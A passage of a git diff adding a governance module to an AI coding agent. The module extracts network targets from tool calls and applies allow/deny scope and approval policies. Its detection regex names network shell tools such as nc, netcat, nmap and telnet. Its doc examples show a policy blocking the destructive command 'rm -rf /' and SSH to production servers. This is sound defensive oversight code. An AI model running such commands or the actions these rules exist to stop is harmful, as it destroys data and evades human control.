+      const octets = trimmed.split(".").map(Number)
+      if (octets.every((o) => o >= 0 && o <= 255)) {
+        return { raw: trimmed, type: "ip", normalized: trimmed }
+      }
+      // Looks like an IP but invalid octets - return unknown to avoid
+      // misclassifying "999.999.999.999" as a domain
+      return { raw: trimmed, type: "unknown", normalized: trimmed }
+    }
+
+    // Check domain
+    if (DOMAIN_REGEX.test(trimmed) && trimmed.includes(".")) {
+      return { raw: trimmed, type: "domain", normalized: trimmed.toLowerCase() }
+    }
+
+    return { raw: trimmed, type: "unknown", normalized: trimmed }
+  }
+
+  /**
+   * Extract network targets from tool arguments based on tool type.
+   *
+   * Different tools have their network targets in different places:
+   * - bash: Embedded in command strings (URLs, IPs, hostnames)
+   * - webfetch: The `url` argument
+   * - websearch: No network targets (search queries)
+   * - Other: Scan all string values for recognizable patterns
+   *
+   * @param tool - The tool name (e.g., "bash", "webfetch")
+   * @param args - The tool arguments to analyze
+   * @returns Array of extracted and deduplicated targets
+   *
+   * @example
+   * ```typescript
+   * // Bash command with curl
+   * extractTargets("bash", { command: "curl https://api.example.com" })
+   * // => [{ raw: "https://api.example.com", type: "url", normalized: "api.example.com" }]
+   *
+   * // WebFetch tool
+   * extractTargets("webfetch", { url: "https://example.com/data" })
+   * // => [{ raw: "https://example.com/data", type: "url", normalized: "example.com" }]
+   *
+   * // SSH command
+   * extractTargets("bash", { command: "ssh user@server.internal.com" })
+   * // => [{ raw: "server.internal.com", type: "domain", normalized: "server.internal.com" }]
+   * ```
+   */
+  export function extractTargets(tool: string, args: Record<string, any>): GovernanceTypes.Target[] {
+    const targets: GovernanceTypes.Target[] = []
+
+    switch (tool) {
+      case "bash":
+        // Bash commands require deep analysis of the command string
+        targets.push(...extractFromBash(args.command || ""))
+        break
+
+      case "webfetch":
+        // WebFetch has a direct URL argument
+        if (args.url) {
+          targets.push(classifyTarget(args.url))
+        }
+        break
+
+      case "websearch":
+        // websearch queries don't have specific network targets
+        break
+
+      default:
+        // For MCP tools and custom tools, scan all string values
+        for (const value of Object.values(args)) {
+          if (typeof value === "string") {
+            const classified = classifyTarget(value)
+            if (classified.type !== "unknown") {
+              targets.push(classified)
+            }
+          }
+        }
+    }
+
+    // Deduplicate by normalized value
+    const seen = new Set<string>()
+    return targets.filter((t) => {
+      if (seen.has(t.normalized)) return false
+      seen.add(t.normalized)
+      return true
+    })
+  }
+
+  /**
+   * Extract URLs, IPs, and domains from bash commands.
+   *
+   * This function uses multiple strategies to find network targets:
+   *
+   * 1. **URL patterns**: Matches http:// and https:// URLs
+   * 2. **IP/CIDR patterns**: Matches IPv4 addresses and CIDR ranges
+   * 3. **SSH patterns**: Matches user@host patterns
+   * 4. **Tool patterns**: Matches hostnames after common networking tools
+   *    (curl, wget, nc, nmap, ssh, scp, ping, etc.)
+   *
+   * @param command - The bash command string to analyze
+   * @returns Array of extracted targets (may contain duplicates)
+   *
+   * @example
+   * ```typescript
+   * extractFromBash("curl -X POST https://api.example.com/data")
+   * // => [{ raw: "https://api.example.com/data", type: "url", normalized: "api.example.com" }]
+   *
+   * extractFromBash("ping 192.168.1.1 && ssh admin@server.local")
+   * // => [
+   * //   { raw: "192.168.1.1", type: "ip", normalized: "192.168.1.1" },
+   * //   { raw: "server.local", type: "domain", normalized: "server.local" }
+   * // ]
+   * ```
+   */
+  function extractFromBash(command: string): GovernanceTypes.Target[] {
+    const targets: GovernanceTypes.Target[] = []
+
+    // URL patterns in command
+    const urlMatches = command.match(/https?:\/\/[^\s'"<>]+/g) || []
+    for (const url of urlMatches) {
+      // Clean trailing punctuation
+      const cleaned = url.replace(/[),;]+$/, "")
+      targets.push(classifyTarget(cleaned))
+    }
+
+    // IP addresses and CIDR ranges
+    const ipMatches = command.match(/\b(\d{1,3}\.){3}\d{1,3}(\/\d{1,2})?\b/g) || []
+    for (const ip of ipMatches) {
+      const classified = classifyTarget(ip)
+      if (classified.type !== "unknown") {
+        targets.push(classified)
+      }
+    }
+
+    // SSH-style user@host patterns
+    const sshMatches = command.match(/@([a-zA-Z0-9][a-zA-Z0-9.-]*[a-zA-Z0-9])/g) || []
+    for (const match of sshMatches) {
+      const host = match.slice(1) // Remove @
+      const classified = classifyTarget(host)
+      if (classified.type !== "unknown") {
+        targets.push(classified)
+      }
+    }
+
+    // Common tool patterns: curl/wget/nc/nmap followed by hostname
+    // This catches patterns like "curl example.com" or "ssh -p 22 server.local"
+    const toolPatterns = [
+      /\b(?:curl|wget|nc|ncat|netcat|nmap|ssh|scp|sftp|rsync|ping|traceroute|telnet)\s+(?:-[^\s]+\s+)*([a-zA-Z0-9][a-zA-Z0-9.-]*\.[a-zA-Z]{2,})/g,
+    ]
+    for (const pattern of toolPatterns) {
+      let match
+      while ((match = pattern.exec(command)) !== null) {
+        if (match[1]) {
+          const classified = classifyTarget(match[1])
+          if (classified.type !== "unknown") {
+            targets.push(classified)
+          }
+        }
+      }
+    }
+
+    return targets
+  }
+
+  /**
+   * Check if an IP address falls within a CIDR range.
+   *
+   * Uses bitwise operations for efficient subnet matching:
+   * 1. Convert both IP and range base to 32-bit integers
+   * 2. Create a bitmask from the prefix length
+   * 3. Compare masked values
+   *
+   * @param ip - IPv4 address to check (e.g., "192.168.1.100")
+   * @param cidr - CIDR range to check against (e.g., "192.168.0.0/16")
+   * @returns true if the IP is within the CIDR range
+   *
+   * @example
+   * ```typescript
+   * ipInCidr("192.168.1.100", "192.168.0.0/16")  // true
+   * ipInCidr("192.168.1.100", "192.168.1.0/24") // true
+   * ipInCidr("192.168.1.100", "10.0.0.0/8")     // false
+   * ipInCidr("10.0.0.1", "10.0.0.0/8")          // true
+   * ```
+   */
+  export function ipInCidr(ip: string, cidr: string): boolean {
+    const [range, bitsStr] = cidr.split("/")
+    const bits = parseInt(bitsStr, 10)
+
+    // Validate prefix length
+    if (bits < 0 || bits > 32) return false
+
+    const ipNum = ipToNumber(ip)
+    const rangeNum = ipToNumber(range)
+
+    if (ipNum === null || rangeNum === null) return false
+
+    // Create mask: for /24, mask = 0xFFFFFF00 (first 24 bits set)
+    // For /0, mask = 0 (match everything)
+    const mask = bits === 0 ? 0 : (~0 << (32 - bits)) >>> 0
+
+    return (ipNum & mask) === (rangeNum & mask)
+  }
+
+  /**
+   * Convert IPv4 string to 32-bit unsigned integer.
+   *
+   * @param ip - IPv4 address string (e.g., "192.168.1.1")
+   * @returns 32-bit unsigned integer, or null if invalid
+   *
+   * @example
+   * ```typescript
+   * ipToNumber("192.168.1.1")   // 3232235777
+   * ipToNumber("0.0.0.0")       // 0
+   * ipToNumber("255.255.255.255") // 4294967295
+   * ipToNumber("invalid")       // null
+   * ```
+   */
+  function ipToNumber(ip: string): number | null {
+    const parts = ip.split(".")
+    if (parts.length !== 4) return null
+
+    let result = 0
+    for (const part of parts) {
+      const num = parseInt(part, 10)
+      if (isNaN(num) || num < 0 || num > 255) return null
+      result = (result << 8) + num
+    }
+    return result >>> 0 // Convert to unsigned
+  }
+
+  /**
+   * Match a target against a pattern.
+   *
+   * Matching strategy depends on pattern and target types:
+   *
+   * - **CIDR pattern + IP target**: Uses CIDR subnet matching
+   * - **CIDR pattern + CIDR target**: Exact string match only
+   * - **All other cases**: Uses wildcard/glob matching
+   *
+   * Wildcard patterns support:
+   * - `*` matches any sequence of characters
+   * - `?` matches any single character
+   * - Example: `*.example.com` matches `api.example.com`
+   *
+   * @param target - The target to match
+   * @param pattern - The pattern to match against
+   * @returns true if the target matches the pattern
+   *
+   * @example
+   * ```typescript
+   * // CIDR matching
+   * matchTarget({ type: "ip", normalized: "192.168.1.1" }, "192.168.0.0/16")  // true
+   * matchTarget({ type: "ip", normalized: "10.0.0.1" }, "192.168.0.0/16")     // false
+   *
+   * // Wildcard matching
+   * matchTarget({ type: "domain", normalized: "api.example.com" }, "*.example.com")  // true
+   * matchTarget({ type: "domain", normalized: "example.com" }, "*.example.com")      // false
+   *
+   * // Exact matching
+   * matchTarget({ type: "domain", normalized: "example.com" }, "example.com")  // true
+   * ```
+   */
+  export function matchTarget(target: GovernanceTypes.Target, pattern: string): boolean {
+    // If pattern is CIDR and target is IP
+    if (CIDR_REGEX.test(pattern) && target.type === "ip") {
+      return ipInCidr(target.normalized, pattern)
+    }
+
+    // If target is CIDR (unusual but possible) - exact match only
+    if (target.type === "cidr" && CIDR_REGEX.test(pattern)) {
+      return target.normalized === pattern
+    }
+
+    // Use wildcard matching for domains and other patterns
+    return Wildcard.match(target.normalized, pattern)
+  }
+}
diff --git a/packages/opencode/src/governance/policy.ts b/packages/opencode/src/governance/policy.ts
new file mode 100644
index 00000000000..abe27c633c8
--- /dev/null
+++ b/packages/opencode/src/governance/policy.ts
@@ -0,0 +1,316 @@
+/**
+ * @fileoverview Governance Policy Module
+ *
+ * This module implements the policy evaluation engine for the Governance system.
+ * Policies define rules that determine what action to take for specific tool
+ * executions based on tool name, command patterns, and target patterns.
+ *
+ * ## Policy Actions
+ *
+ * Each policy specifies one of three actions:
+ *
+ * - **auto-approve**: Allow the tool to execute without user confirmation
+ * - **require-approval**: Defer to the existing permission system for user approval
+ * - **blocked**: Deny the tool execution entirely
+ *
+ * ## Policy Matching
+ *
+ * Policies are evaluated in order - **first match wins**. This allows for
+ * specific rules to override general ones when placed earlier in the list.
+ *
+ * A policy matches when ALL specified conditions are met (AND logic):
+ * - `tools`: Tool name matches at least one pattern
+ * - `commands`: For bash tools, command matches at least one pattern
+ * - `targets`: At least one extracted target matches at least one pattern
+ *
+ * ## Example Scenarios
+ *
+ * 1. Auto-approve all read-only tools
+ * 2. Block SSH to production servers
+ * 3. Require approval for any bash command
+ * 4. Auto-approve internal API calls
+ *
+ * @module governance/policy
+ */
+
+import { GovernanceTypes } from "./types"
+import { GovernanceMatcher } from "./matcher"
+import { Wildcard } from "../util/wildcard"
+import { Log } from "../util/log"
+
+export namespace GovernancePolicy {
+  const log = Log.create({ service: "governance.policy" })
+
+  /**
+   * Policy action types.
+   *
+   * - `auto-approve`: Execute without user confirmation
+   * - `require-approval`: Ask user for permission (default behavior)
+   * - `blocked`: Deny execution entirely
+   *
+   * @example
+   * ```typescript
+   * const action: PolicyAction = "auto-approve"
+   * ```
+   */
+  export type PolicyAction = "auto-approve" | "require-approval" | "blocked"
+
+  /**
+   * Policy configuration structure.
+   *
+   * Defines a single policy rule with conditions and an action.
+   * All condition fields are optional - if not specified, they match everything.
+   *
+   * @property action - What to do when this policy matches
+   * @property tools - Tool name patterns to match (supports wildcards)
+   * @property commands - Command patterns for bash tool (supports wildcards)
+   * @property targets - Target patterns to match (supports wildcards and CIDR)
+   * @property description - Human-readable description for logs and auditing
+   *
+   * @example
+   * ```typescript
+   * // Block SSH to production
+   * const policy: PolicyConfig = {
+   *   action: "blocked",
+   *   tools: ["bash"],
+   *   commands: ["ssh *"],
+   *   targets: ["*.prod.*"],
+   *   description: "Block SSH to production servers"
+   * }
+   *
+   * // Auto-approve read tools
+   * const readPolicy: PolicyConfig = {
+   *   action: "auto-approve",
+   *   tools: ["read", "glob", "grep"],
+   *   description: "Auto-approve read-only tools"
+   * }
+   * ```
+   */
+  export interface PolicyConfig {
+    action: PolicyAction
+    tools?: string[]
+    commands?: string[]
+    targets?: string[]
+    description?: string
+  }
+
+  /**
+   * Result of policy evaluation.
+   *
+   * @property action - The determined action for this tool execution
+   * @property matchedPolicy - Name/description of the policy that matched
+   * @property reason - Human-readable explanation of the decision
+   *
+   * @example
+   * ```typescript
+   * const result: PolicyResult = {
+   *   action: "blocked",
+   *   matchedPolicy: "Block SSH to production",
+   *   reason: "Matched policy: Block SSH to production"
+   * }
+   * ```
+   */
+  export interface PolicyResult {
+    action: PolicyAction
+    matchedPolicy?: string
+    reason?: string
+  }
+
+  /**
+   * Evaluate policies against a tool execution.
+   *
+   * Policies are evaluated in order - **first matching policy wins**.
+   * This allows specific rules to be placed before general ones.
+   *
+   * If no policy matches, the default action is applied.
+   *
+   * @param tool - The tool name being executed
+   * @param args - The tool arguments
+   * @param targets - Network targets extracted from arguments
+   * @param policies - Array of policies to evaluate (order matters!)
+   * @param defaultAction - Action to use if no policy matches
+   * @returns The policy result with action and explanation
+   *
+   * @example
+   * ```typescript
+   * const policies = [
+   *   { action: "blocked", tools: ["bash"], commands: ["rm -rf *"], description: "Block dangerous commands" },
+   *   { action: "auto-approve", tools: ["read", "glob"], description: "Auto-approve read tools" },
+   *   { action: "require-approval", tools: ["bash"], description: "Review all bash commands" }
+   * ]
+   *
+   * // Read tool - matches second policy
+   * evaluate("read", { file: "test.ts" }, [], policies, "require-approval")
+   * // => { action: "auto-approve", matchedPolicy: "Auto-approve read tools", ... }
+   *
+   * // Dangerous bash - matches first policy
+   * evaluate("bash", { command: "rm -rf /" }, [], policies, "require-approval")
+   * // => { action: "blocked", matchedPolicy: "Block dangerous commands", ... }
+   *
+   * // Safe bash - matches third policy
+   * evaluate("bash", { command: "ls -la" }, [], policies, "require-approval")
+   * // => { action: "require-approval", matchedPolicy: "Review all bash commands", ... }
+   * ```
+   */
+  export function evaluate(
+    tool: string,
+    args: Record<string, any>,
+    targets: GovernanceTypes.Target[],
+    policies: PolicyConfig[] | undefined,
+    defaultAction: PolicyAction
+  ): PolicyResult {
+    // No policies defined - use default
+    if (!policies || policies.length === 0) {
+      return {
+        action: defaultAction,
+        reason: "No policies defined, using default action",
+      }
+    }
+
+    // Evaluate policies in order - first match wins
+    for (let i = 0; i < policies.length; i++) {
+      const policy = policies[i]
+      if (matchesPolicy(tool, args, targets, policy)) {
+        const policyName = policy.description || `Policy #${i + 1}`
+        log.info("Policy matched", {
+          tool,
+          policy: policyName,
+          action: policy.action,
+        })
+        return {
+          action: policy.action,
+          matchedPolicy: policyName,
+          reason: `Matched policy: ${policyName}`,
+        }
+      }
+    }
+
+    // No policy matched - use default
+    return {
+      action: defaultAction,
+      reason: "No policy matched, using default action",
+    }
+  }
+
+  /**
+   * Check if a tool execution matches a policy.
+   *
+   * All specified conditions must match (AND logic).
+   * Unspecified conditions are considered to match everything.
+   *
+   * Matching rules:
+   * - `tools`: Tool name must match at least one pattern
+   * - `commands`: For bash only - command must match at least one pattern
+   * - `targets`: At least one target must match at least one pattern
+   *
+   * @param tool - Tool name being executed
+   * @param args - Tool arguments
+   * @param targets - Extracted network targets
+   * @param policy - Policy to check against
+   * @returns true if all specified conditions match
+   *
+   * @example
+   * ```typescript
+   * // Policy with tools only - matches any read tool
+   * matchesPolicy("read", {}, [], { action: "auto-approve", tools: ["read", "glob"] })
+   * // => true
+   *
+   * // Policy with tools and commands - must match both
+   * matchesPolicy("bash", { command: "ls" }, [], {
+   *   action: "blocked",
+   *   tools: ["bash"],
+   *   commands: ["rm *"]
+   * })
+   * // => false (command doesn't match)
+   * ```
+   */
+  function matchesPolicy(
+    tool: string,
+    args: Record<string, any>,
+    targets: GovernanceTypes.Target[],
+    policy: PolicyConfig
+  ): boolean {
+    // Check tool pattern if specified
+    if (policy.tools && policy.tools.length > 0) {
+      const toolMatches = policy.tools.some((pattern) => Wildcard.match(tool, pattern))
+      if (!toolMatches) {
+        return false
+      }
+    }
+
+    // Check command pattern if specified (only applies to bash tool)
+    if (policy.commands && policy.commands.length > 0) {
+      if (tool !== "bash") {
+        // Commands filter only applies to bash, so if tool isn't bash, no match
+        return false
+      }
+      const command = args.command || ""
+      const commandMatches = policy.commands.some((pattern) => Wildcard.match(command, pattern))
+      if (!commandMatches) {
+        return false
+      }
+    }
+
+    // Check target patterns if specified
+    if (policy.targets && policy.targets.length > 0) {
+      // If no targets were extracted, this policy doesn't apply
+      if (targets.length === 0) {
+        return false
+      }
+      // At least one target must match at least one pattern
+      const targetMatches = targets.some((target) =>
+        policy.targets!.some((pattern) => GovernanceMatcher.matchTarget(target, pattern))
+      )
+      if (!targetMatches) {
+        return false
+      }
+    }
+
+    // All specified conditions matched
+    return true
+  }
+
+  /**
+   * Get a human-readable description of a policy.
+   *
+   * Useful for displaying policy information in logs, UI, or audit reports.
+   *
+   * @param policy - The policy to describe
+   * @returns Formatted string describing the policy
+   *
+   * @example
+   * ```typescript
+   * describe({
+   *   action: "blocked",
+   *   tools: ["bash"],
+   *   commands: ["ssh *"],
+   *   targets: ["*.prod.*"],
+   *   description: "Block SSH to production"
+   * })
+   * // => "Block SSH to production | Action: blocked | Tools: bash | Commands: ssh * | Targets: *.prod.*"
+   * ```
+   */
+  export function describe(policy: PolicyConfig): string {
+    const parts: string[] = []
+
+    if (policy.description) {
+      parts.push(policy.description)
+    }
+
+    parts.push(`Action: ${policy.action}`)
+
+    if (policy.tools && policy.tools.length > 0) {
+      parts.push(`Tools: ${policy.tools.join(", ")}`)
+    }
+
+    if (policy.commands && policy.commands.length > 0) {
+      parts.push(`Commands: ${policy.commands.join(", ")}`)
+    }
+
+    if (policy.targets && policy.targets.length > 0) {
+      parts.push(`Targets: ${policy.targets.join(", ")}`)
+    }
+
+    return parts.join(" | ")
+  }
+}
diff --git a/packages/opencode/src/governance/scope.ts b/packages/opencode/src/governance/scope.ts
new file mode 100644
index 00000000000..1fb24823591
--- /dev/null
+++ b/packages/opencode/src/governance/scope.ts
@@ -0,0 +1,237 @@
+/**
+ * @fileoverview Governance Scope Module
+ *
+ * This module enforces network scope restrictions for tool executions.
+ * It provides the first line of defense in the governance system,
+ * ensuring that tools can only interact with allowed network targets.
+ *
+ * ## Scope Configuration
+ *
+ * Scope is configured with allow/deny lists for two target categories:
+ *
+ * - **IP scope**: Controls access to IP addresses and CIDR ranges
+ * - **Domain scope**: Controls access to domain names and URLs
+ *
+ * ## Evaluation Order
+ *
+ * For each target, scope is evaluated as follows:
+ *
+ * 1. **Deny list check**: If the target matches any deny pattern, it's blocked
+ * 2. **Allow list check**: If an allow list exists and the target doesn't match, it's blocked
+ * 3. **Default allow**: If no rules apply, the target is allowed
+ *
+ * This means deny lists always take precedence over allow lists.
+ *
+ * ## Use Cases
+ *
+ * - Restrict AI to internal network only (e.g., `10.0.0.0/8`)
+ * - Block access to production systems (e.g., `*.prod.company.com`)
+ * - Allow only specific external APIs (e.g., `api.github.com`)
+ *
+ * @module governance/scope
+ */
+
+import { GovernanceTypes } from "./types"
+import { GovernanceMatcher } from "./matcher"
+import { Log } from "../util/log"
+
+export namespace GovernanceScope {
+  const log = Log.create({ service: "governance.scope" })
+
+  /**
+   * Scope configuration structure.
+   *
+   * Defines allow/deny lists for IP and domain targets.
+   * All fields are optional - if not specified, no restrictions apply.
+   *
+   * @property ip - IP address and CIDR scope rules
+   * @property ip.allow - IP patterns that are allowed (CIDR notation supported)
+   * @property ip.deny - IP patterns that are blocked (checked first)
+   * @property domain - Domain and URL scope rules
+   * @property domain.allow - Domain patterns that are allowed (wildcards supported)
+   * @property domain.deny - Domain patterns that are blocked (checked first)
+   *
+   * @example
+   * ```typescript
+   * const scope: GovernanceScope.ScopeConfig = {
+   *   ip: {
+   *     allow: ["10.0.0.0/8", "192.168.0.0/16"],  // Internal networks only
+   *     deny: ["10.0.0.1/32"]                      // But not the gateway
+   *   },
+   *   domain: {
+   *     allow: ["*.company.com", "github.com"],   // Company domains + GitHub
+   *     deny: ["*.prod.company.com"]              // But not production
+   *   }
+   * }
+   * ```
+   */
+  export interface ScopeConfig {
+    ip?: {
+      allow?: string[]
+      deny?: string[]
+    }
+    domain?: {
+      allow?: string[]
+      deny?: string[]
+    }
+  }
+
+  /**
+   * Result of a scope check.
+   *
+   * @property allowed - Whether all targets passed scope checks
+   * @property reason - Explanation of why the check failed (if applicable)
+   *
+   * @example
+   * ```typescript
+   * // Successful check
+   * const success: ScopeResult = { allowed: true }
+   *
+   * // Failed check
+   * const failure: ScopeResult = {
+   *   allowed: false,
+   *   reason: "IP 8.8.8.8 not in allowed scope: [10.0.0.0/8]"
+   * }
+   * ```
+   */
+  export interface ScopeResult {
+    allowed: boolean
+    reason?: string
+  }
+
+  /**
+   * Check if all targets are within the allowed scope.
+   *
+   * This is the main entry point for scope checking. It iterates through
+   * all extracted targets and validates each against the scope configuration.
+   *
+   * Returns early on first violation for efficiency.
+   *
+   * @param targets - Network targets extracted from tool arguments
+   * @param scope - Scope configuration (allow/deny lists)
+   * @returns Result indicating if all targets are allowed
+   *
+   * @example
+   * ```typescript
+   * const targets = [
+   *   { raw: "10.0.0.5", type: "ip", normalized: "10.0.0.5" },
+   *   { raw: "api.company.com", type: "domain", normalized: "api.company.com" }
+   * ]
+   *
+   * const scope = {
+   *   ip: { allow: ["10.0.0.0/8"] },
+   *   domain: { allow: ["*.company.com"] }
+   * }
+   *
+   * const result = GovernanceScope.check(targets, scope)
+   * // => { allowed: true }
+   * ```
+   */
+  export function check(targets: GovernanceTypes.Target[], scope: ScopeConfig | undefined): ScopeResult {
+    // If no scope configured, allow everything
+    if (!scope) {
+      return { allowed: true, reason: "No scope restrictions configured" }
+    }
+
+    // If no targets extracted, allow (nothing to check)
+    if (targets.length === 0) {
+      return { allowed: true, reason: "No network targets detected" }
+    }
+
+    // Check each target against scope rules
+    for (const target of targets) {
+      const result = checkTarget(target, scope)
+      if (!result.allowed) {
+        log.info("Scope violation", { target: target.normalized, reason: result.reason })
+        return result
+      }
+    }
+
+    return { allowed: true }
+  }
+
+  /**
+   * Check a single target against scope rules.
+   *
+   * Evaluation order for each target type:
+   * 1. Check deny list first (if matches, immediately deny)
+   * 2. Check allow list (if exists and doesn't match, deny)
+   * 3. Default to allow
+   *
+   * @param target - Single network target to check
+   * @param scope - Scope configuration
+   * @returns Result for this specific target
+   *
+   * @example
+   * ```typescript
+   * // IP target against IP scope
+   * checkTarget(
+   *   { raw: "10.0.0.5", type: "ip", normalized: "10.0.0.5" },
+   *   { ip: { allow: ["10.0.0.0/8"] } }
+   * )
+   * // => { allowed: true }
+   *
+   * // Domain target blocked by deny list
+   * checkTarget(
+   *   { raw: "prod.company.com", type: "domain", normalized: "prod.company.com" },
+   *   { domain: { deny: ["*.prod.*"] } }
+   * )
+   * // => { allowed: false, reason: "Domain prod.company.com matches deny pattern: *.prod.*" }
+   * ```
+   */
+  function checkTarget(target: GovernanceTypes.Target, scope: ScopeConfig): ScopeResult {
+    // Check IP/CIDR rules for IP targets
+    if ((target.type === "ip" || target.type === "cidr") && scope.ip) {
+      // Deny list takes precedence - check first
+      if (scope.ip.deny) {
+        for (const pattern of scope.ip.deny) {
+          if (GovernanceMatcher.matchTarget(target, pattern)) {
+            return {
+              allowed: false,
+              reason: `IP ${target.normalized} matches deny pattern: ${pattern}`,
+            }
+          }
+        }
+      }
+
+      // If allow list exists and is non-empty, target must match at least one
+      if (scope.ip.allow && scope.ip.allow.length > 0) {
+        const matches = scope.ip.allow.some((p) => GovernanceMatcher.matchTarget(target, p))
+        if (!matches) {
+          return {
+            allowed: false,
+            reason: `IP ${target.normalized} not in allowed scope: [${scope.ip.allow.join(", ")}]`,
+          }
+        }
+      }
+    }
+
+    // Check domain rules for domain/URL targets
+    if ((target.type === "domain" || target.type === "url") && scope.domain) {
+      // Deny list takes precedence - check first
+      if (scope.domain.deny) {
+        for (const pattern of scope.domain.deny) {
+          if (GovernanceMatcher.matchTarget(target, pattern)) {
+            return {
+              allowed: false,
+              reason: `Domain ${target.normalized} matches deny pattern: ${pattern}`,
+            }
+          }
+        }
+      }
+
+      // If allow list exists and is non-empty, target must match at least one
+      if (scope.domain.allow && scope.domain.allow.length > 0) {
+        const matches = scope.domain.allow.some((p) => GovernanceMatcher.matchTarget(target, p))
+        if (!matches) {
+          return {
+            allowed: false,
+            reason: `Domain ${target.normalized} not in allowed scope: [${scope.domain.allow.join(", ")}]`,
+          }
+        }
+      }
+    }
+
+    return { allowed: true }
+  }
+}
diff --git a/packages/opencode/src/governance/types.ts b/packages/opencode/src/governance/types.ts
new file mode 100644
index 00000000000..c2999adcdf3
--- /dev/null
+++ b/packages/opencode/src/governance/types.ts
@@ -0,0 +1,234 @@
+/**
+ * @fileoverview Governance Types Module
+ *
+ * This module defines the core types and Zod schemas used throughout the
+ * Governance Engine. All types are defined as Zod schemas for runtime
+ * validation and TypeScript type inference.
+ *
+ * ## Type Hierarchy
+ *
+ * - **Outcome**: Result of a governance check (allowed, denied, pending-approval, error)
+ * - **TargetType**: Classification of extracted targets (ip, cidr, domain, url, unknown)
+ * - **Target**: A network target extracted from tool arguments
+ * - **AuditEntry**: Complete audit log record of a governance check
+ * - **CheckRequest**: Input to the governance check function
+ * - **CheckResult**: Output from the governance check function
+ *
+ * ## Bus Events
+ *
+ * The module also defines governance-related bus events for real-time
+ * notification of governance checks and policy violations.
+ *
+ * @module governance/types
+ */
+
+import z from "zod"
+import { BusEvent } from "../bus/bus-event"
+
+export namespace GovernanceTypes {
+  /**
+   * Outcome of a governance check.
+   *
+   * - `allowed`: Tool execution can proceed without additional approval
+   * - `denied`: Tool execution is blocked by governance policy
+   * - `pending-approval`: Tool execution requires user approval (defers to permission system)
+   * - `error`: An error occurred during governance check
+   *
+   * @example
+   * ```typescript
+   * const outcome: GovernanceTypes.Outcome = "allowed"
+   * ```
+   */
+  export const Outcome = z.enum(["allowed", "denied", "pending-approval", "error"])
+  export type Outcome = z.infer<typeof Outcome>
+
+  /**
+   * Classification of a network target extracted from tool arguments.
+   *
+   * - `ip`: IPv4 address (e.g., "192.168.1.1")
+   * - `cidr`: CIDR notation (e.g., "10.0.0.0/8")
+   * - `domain`: Domain name (e.g., "example.com")
+   * - `url`: Full URL (e.g., "https://example.com/path")
+   * - `unknown`: Could not be classified
+   *
+   * @example
+   * ```typescript
+   * const targetType: GovernanceTypes.TargetType = "domain"
+   * ```
+   */
+  export const TargetType = z.enum(["ip", "cidr", "domain", "url", "unknown"])
+  export type TargetType = z.infer<typeof TargetType>
+
+  /**
+   * A network target extracted from tool arguments.
+   *
+   * Targets are extracted by the Matcher module and represent potential
+   * network endpoints that the tool might interact with.
+   *
+   * @property raw - Original string that was classified
+   * @property type - Detected target type (ip, cidr, domain, url, unknown)
+   * @property normalized - Normalized form for consistent matching
+   *   - URLs: hostname is extracted and lowercased
+   *   - Domains: lowercased
+   *   - IPs/CIDRs: kept as-is
+   *
+   * @example
+   * ```typescript
+   * const target: GovernanceTypes.Target = {
+   *   raw: "https://API.Example.COM/v1/users",
+   *   type: "url",
+   *   normalized: "api.example.com"
+   * }
+   * ```
+   */
+  export const Target = z.object({
+    raw: z.string().describe("Original string that was classified"),
+    type: TargetType.describe("Detected target type"),
+    normalized: z.string().describe("Normalized form (e.g., hostname from URL, lowercase domain)"),
+  })
+  export type Target = z.infer<typeof Target>
+
+  /**
+   * Complete audit log entry for a governance check.
+   *
+   * Audit entries are created for every governance check, regardless of outcome.
+   * They provide a complete audit trail of tool executions and governance decisions.
+   *
+   * @property id - Unique audit entry ID (ascending for chronological ordering)
+   * @property timestamp - Unix timestamp in milliseconds when the check occurred
+   * @property sessionID - Session that executed the tool
+   * @property callID - Unique tool call ID for correlation with tool execution
+   * @property tool - Name of the tool that was checked
+   * @property targets - Network targets extracted from tool arguments
+   * @property outcome - Result of the governance check
+   * @property policy - Name of the policy that matched (if any)
+   * @property reason - Human-readable explanation of the decision
+   * @property args - Tool arguments (only included if audit.include_args is true)
+   * @property duration - Time taken for governance check in milliseconds
+   *
+   * @example
+   * ```typescript
+   * const entry: GovernanceTypes.AuditEntry = {
+   *   id: "tool_01ABC123",
+   *   timestamp: 1705312800000,
+   *   sessionID: "session_xyz",
+   *   callID: "call_456",
+   *   tool: "bash",
+   *   targets: [{ raw: "10.0.0.1", type: "ip", normalized: "10.0.0.1" }],
+   *   outcome: "allowed",
+   *   policy: "Allow internal network",
+   *   reason: "Matched policy: Allow internal network",
+   *   duration: 5
+   * }
+   * ```
+   */
+  export const AuditEntry = z.object({
+    id: z.string().describe("Unique audit entry ID"),
+    timestamp: z.number().describe("Unix timestamp in milliseconds"),
+    sessionID: z.string().describe("Session that executed the tool"),
+    callID: z.string().describe("Unique tool call ID"),
+    tool: z.string().describe("Tool name that was executed"),
+    targets: z.array(Target).describe("Targets extracted from tool arguments"),
+    outcome: Outcome.describe("Result of governance check"),
+    policy: z.string().optional().describe("Name of matched policy"),
+    reason: z.string().optional().describe("Human-readable explanation"),
+    args: z.record(z.string(), z.any()).optional().describe("Tool arguments (if audit.include_args is true)"),
+    duration: z.number().optional().describe("Time taken for governance check in ms"),
+  })
+  export type AuditEntry = z.infer<typeof AuditEntry>
+
+  /**
+   * Input to the governance check function.
+   *
+   * @property sessionID - Current session ID for audit logging
+   * @property callID - Unique tool call ID for correlation
+   * @property tool - Name of the tool being executed
+   * @property args - Tool arguments to analyze for network targets
+   *
+   * @example
+   * ```typescript
+   * const request: GovernanceTypes.CheckRequest = {
+   *   sessionID: "session_abc",
+   *   callID: "call_123",
+   *   tool: "bash",
+   *   args: { command: "curl https://api.example.com" }
+   * }
+   * ```
+   */
+  export const CheckRequest = z.object({
+    sessionID: z.string().describe("Session ID"),
+    callID: z.string().describe("Tool call ID"),
+    tool: z.string().describe("Tool name"),
+    args: z.record(z.string(), z.any()).describe("Tool arguments"),
+  })
+  export type CheckRequest = z.infer<typeof CheckRequest>
+
+  /**
+   * Output from the governance check function.
+   *
+   * @property allowed - Whether tool execution should proceed
+   * @property outcome - Detailed outcome classification
+   * @property targets - Network targets that were extracted and checked
+   * @property matchedPolicy - Name of the policy that determined the outcome
+   * @property reason - Human-readable explanation of the decision
+   *
+   * @example
+   * ```typescript
+   * const result: GovernanceTypes.CheckResult = {
+   *   allowed: true,
+   *   outcome: "allowed",
+   *   targets: [{ raw: "10.0.0.1", type: "ip", normalized: "10.0.0.1" }],
+   *   matchedPolicy: "Allow internal network",
+   *   reason: "Matched policy: Allow internal network"
+   * }
+   * ```
+   */
+  export const CheckResult = z.object({
+    allowed: z.boolean().describe("Whether execution should proceed"),
